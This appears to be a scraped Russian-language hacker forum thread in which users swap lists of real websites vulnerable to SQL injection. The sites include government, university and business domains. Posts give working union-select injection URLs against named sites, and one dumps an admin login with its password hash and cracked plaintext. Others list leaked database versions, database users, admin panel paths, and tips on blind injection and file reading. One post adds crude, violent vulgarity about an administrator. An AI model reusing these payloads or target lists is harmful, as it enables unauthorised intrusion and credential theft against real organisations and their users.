http://www.disasterinfo.mn version() = 5.0.22-Debian_0ubuntu6.06-log user() = root@localhost database() = forum смотрим все таблички теперь смотрим все базы есть хорошие таблички disasterinfo.users, main_data2.admin так же есть доступ к mysql.user есть права на чтение файлов) переходим к таблицам... таблица с админами: таблица с юзерами : админка тут http://www.disasterinfo.mn/admin/ прекрасная база,для тренировки новичкам) спасибо за внимание)
http://www.haers.ru/index.php?page=86&id=-1+union+select+1,2,3,4,5,concat(0x3a3a,login_user,0x3a3a,pass_user),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+haers.user+limit+30,190 login ->dom0744 pass ->d6a4f42b2ef93aa0f440ebcfe24a3351 ->fylhtq Админится через CP, хер расковырял =((, фурычит load_file, насчет outfile х*й понял. Пускай админа отдерет негр, как последнюю девку!
хватит постить одно и тоже каждый день! http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum.antichat.ru+Activetoy.co.uk+&btnG=Search
Знакомтесь Code: http://lotussoft.com.ua ребята делают сайты, в портфолио сайты сделанные в 2005 году многие уязвимы, хз может и остальные тоже =)
Nbfet.gov.cn - PR 5 Wagrowiec.um.gov.pl - PR 4 4 ветка должны быть юзеры.. Ipirangadonorte.mt.gov.br 5 ветка.. /adm Cnunirea.licee.edu.ro Students.ee.sun.ac.za 5 ветка, таблы.. сам форум не нашел ( юзеры.. News.ogel.dk Grainedepastel-uk.com 5 ver. tables.. /dejainscrit.php?prov=index
http://www.kalyx.com/store/insertorderalt.cfm?ItemID=1%20or%201=(SELECT+TOP+1+table_name+FROM+information_schema.tables)-- dont get countinue
http://www.anavasi.gr PR 4 version()=5.0.51a-community user()=anavasi_ana@localhost database()=anavasi_ana http://www.aab.org.uk PR 6 blind sql version=3 http://www.copmed.org.uk PR 5 version=4 http://www.zenithcafe.co.uk PR 2 version=5 не смог подобрать кол-во полей... http://wedc.lboro.ac.uk PR 6 version=5 читать файлики нельзя
Люди есть у кого нибуть сайт где можно слово в hex число перевести! А то был оди хороший сайт http://hack-shop.org.ru/tools-code-encode но его жестоко засрали какойто х*йней ! В инете чтото ваще непонятное!!! (ПРИМЕР:Перевести допустим card_user (переводил на хак-туле - бывшем) получалось 0x636172645f75736572 ! ОЧ нужен почти такой же сайт!!!))Ну или чото типа того приписать 0x не сложно)
Полдник..=) 1,2,3,4,5,6,7,8 Dbname:journalism User:[email protected] Version:5.0.45 ============================================= Эта есть в антибояне, но мож кто-то захочет ковырнуть еще раз. 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 version:4.0.20-debug-debug Dbname:mrc User:[email protected] =============================================
Valgamaa.ee - PR 5 5 ver. tables Canallatino.tv - PR 4 Pangkalpinang.go.id - PR 3 Elhacker.org - PR 3 Elincom.gr
www.edu.ru - Российское образование. Федеральный образовательный портал: учреждения, программы, стандарты
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
www.sport-moda.ru Уязвимость в скрипте показа новостей: http://www.sport-moda.ru/news/view_new.php?id=1' Колонки: http://www.sport-moda.ru/news/view_new.php?id=-286+union+select+1,2,3/* Информация о базе: u15055 5.0.45-log [email protected]
BanQui таким способом узнается версия в mssql @@version тоже самое что и version() просто для каждой системы свои запросы ) $p01nt жаль нельзя аватарки заливать (
http://www.sephiroth.it PR 4 4 ветка слепая скуль) http://www.infn.it если верить гуглу,то PR 8 и опять blind... version=5 http://www.hvar.is PR 6 version = 5 blind sql http://www.ethics.utoronto.ca PR 5 version = 3 всем удачного вечера =) HF & GL
